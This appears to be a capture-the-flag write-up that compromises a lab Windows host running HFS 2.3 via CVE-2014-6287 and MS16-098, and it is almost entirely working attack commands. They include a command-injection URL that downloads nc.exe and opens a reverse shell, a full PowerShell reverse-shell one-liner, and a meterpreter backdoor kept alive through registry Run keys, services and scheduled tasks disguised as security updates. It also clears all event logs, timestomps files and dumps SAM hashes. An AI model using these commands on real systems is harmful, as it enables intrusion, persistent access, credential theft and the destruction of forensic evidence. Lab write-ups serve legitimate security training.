Machine Synopsis
Key Exploitation Techniques:
- HttpFileServer (HFS) version identification and exploitation
- Remote code execution via CVE-2014-6287
- Windows kernel privilege escalation (MS16-098)
- File transfer techniques for exploit delivery
Reconnaissance & Enumeration
Port Discovery
1
2
3
| $ nmap -p- --min-rate 10000 10.10.10.8
PORT STATE SERVICE
80/tcp open http
|
Service Enumeration
1
2
3
4
5
6
| $ nmap -p 80 -sC -sV 10.10.10.8
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
|
Web Application Analysis
Accessing http://10.10.10.8 reveals HttpFileServer 2.3 with a file browser interface.
1
2
3
4
5
6
7
8
| # Check for known vulnerabilities
$ searchsploit hfs 2.3
-------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------------------
HFS Http File Server 2.3.x - Remote Command Execution | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command | windows/remote/39161.py
-------------------------------------------------------- ---------------------------------
|
Exploitation
CVE-2014-6287 Analysis
HttpFileServer 2.3 contains a remote command execution vulnerability in the search functionality. The vulnerability exists in the findMacroMarker
function where user input is processed without proper sanitization.
Exploit Execution
1
2
3
| # Copy the Python exploit
$ searchsploit -m 39161
$ cat 39161.py
|
The exploit requires hosting nc.exe
for downloading and executing on the target:
1
2
3
4
5
6
7
8
9
10
| # Setup web server for nc.exe
$ locate nc.exe
/usr/share/windows-resources/binaries/nc.exe
$ cp /usr/share/windows-resources/binaries/nc.exe .
$ python3 -m http.server 80
# Setup netcat listener
$ nc -nlvp 443
# Execute the exploit
$ python 39161.py 10.10.10.8 80
|
Initial Shell Access
C:\Users\kostas\Desktop> whoami
optimum\kostas
C:\Users\kostas\Desktop> type user.txt
d0c39409d7b994a9a1389ebf38ef5f73
Privilege Escalation
C:\Users\kostas\Desktop> systeminfo
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
System Type: x64-based PC
Hotfix(s): 31 Hotfix(s) Installed.
Vulnerability Assessment
1
2
3
4
5
| # Use Windows Exploit Suggester
$ python windows-exploit-suggester.py --database 2021-05-16-mssb.xlsx --systeminfo systeminfo.txt
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
|
MS16-098 Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| # Download pre-compiled exploit
$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
# Host exploit for download
$ python3 -m http.server 80
# Download and execute exploit
C:\Users\kostas\Desktop> powershell wget "http://10.10.14.4/41020.exe" -outfile "exploit.exe"
C:\Users\kostas\Desktop> exploit.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop> whoami
nt authority\system
C:\Users\kostas\Desktop> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
51ed1b36553c8461f4552c2e92b3eeed
|
Post-Exploitation Techniques
Persistence Methods
Registry Persistence
1
2
3
4
5
6
7
8
9
10
11
12
13
| # Create backdoor payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe -o backdoor.exe
# Transfer to target
$ python3 -m http.server 80
# Download backdoor on target
C:\Users\kostas\Desktop> powershell wget "http://10.10.14.4/backdoor.exe" -outfile "C:\Windows\System32\backdoor.exe"
# Add registry auto-start entry
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "C:\Windows\System32\backdoor.exe"
# Verify persistence
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Updater"
|
Service Installation
# Create persistent service (using the same backdoor.exe created above)
sc create "SecurityUpdate" binpath= "C:\Windows\System32\backdoor.exe" start= auto
sc start "SecurityUpdate"
sc query "SecurityUpdate"
# Setup handler for backdoor connections
# On attacking machine:
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.4
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit
Scheduled Task
# Create system startup task (using the same backdoor.exe)
schtasks /create /tn "SecurityUpdate" /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru SYSTEM
schtasks /query /tn "SecurityUpdate"
# Test scheduled task execution
schtasks /run /tn "SecurityUpdate"
Defense Evasion
Log Cleanup
# Clear Windows Event Logs
for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
# Clear PowerShell history
del "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
# Clear IIS logs if present
del "C:\inetpub\logs\LogFiles\W3SVC1\*.log"
File Attribute Manipulation
# Hide backdoor files
attrib +h +s C:\Windows\System32\backdoor.exe
attrib +h +s C:\Windows\Temp\exploit.exe
# Timestomp files to match system files
powershell "(Get-Item C:\Windows\System32\backdoor.exe).LastWriteTime = (Get-Item C:\Windows\System32\kernel32.dll).LastWriteTime"
Lateral Movement Preparation
Network Discovery
# Discover network hosts
for /L %i in (1,1,254) do @ping -n 1 -w 100 10.10.10.%i > nul && echo 10.10.10.%i is alive
# Port scanning
powershell "1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect('10.10.10.1',$_)) \"Port $_ is open\"} 2>$null"
Credential Harvesting
# Dump SAM database
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system
# Search for stored credentials
cmdkey /list
WMI Remote Execution
# Execute commands remotely (if credentials available)
wmic /node:"target_ip" /user:"domain\username" /password:"password" process call create "cmd.exe /c command"
Alternative Exploitation Methods
Manual HFS Exploitation
1
2
3
4
5
| # Manual command execution via URL encoding
curl "http://10.10.10.8/?search=%00{.exec|cmd.exe /c whoami.}"
# Download and execute payload
curl "http://10.10.10.8/?search=%00{.exec|cmd.exe /c powershell -c \"(new-object System.Net.WebClient).DownloadFile('http://10.10.14.4/nc.exe','C:\\Windows\\Temp\\nc.exe'); C:\\Windows\\Temp\\nc.exe -e cmd.exe 10.10.14.4 443\".}"
|
PowerShell Reverse Shell
# PowerShell one-liner reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Alternative Privilege Escalation
Watson Enumeration
1
2
3
| # Use Watson for privilege escalation identification
Invoke-WebRequest -Uri "http://10.10.14.4/Watson.exe" -OutFile "C:\Windows\Temp\Watson.exe"
C:\Windows\Temp\Watson.exe
|
PowerUp Enumeration
1
2
3
4
| # Use PowerUp for privilege escalation vectors
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks
|